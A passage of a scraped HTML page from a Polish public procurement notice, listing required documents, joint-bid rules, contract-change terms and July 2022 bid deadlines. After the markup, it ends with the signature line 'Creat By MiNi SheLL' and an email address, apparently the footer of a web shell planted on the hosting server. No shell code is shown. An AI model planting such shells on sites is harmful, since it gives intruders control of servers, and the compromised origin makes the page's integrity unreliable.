przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami – w zakresie informacji określonych w Załączniku nr 12 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) umowę konsorcjum w przypadku składania oferty przez podmioty występujące wspólnie,<br/>b) umowę spółki cywilnej w przypadku składania oferty przez podmioty realizującej zadanie w tej formie organizacyjnej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o zamówienie. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia na podstawie art. 58 ust. 1 ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty.<br/>2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3.Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 u.p.z.p<br/>składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni<br/>Wykonawcy według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegający się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej <br/> oferty w zakresie uregulowanym w art. 454 - 455 Pzp. <br/><br/>2. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy <br/> pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com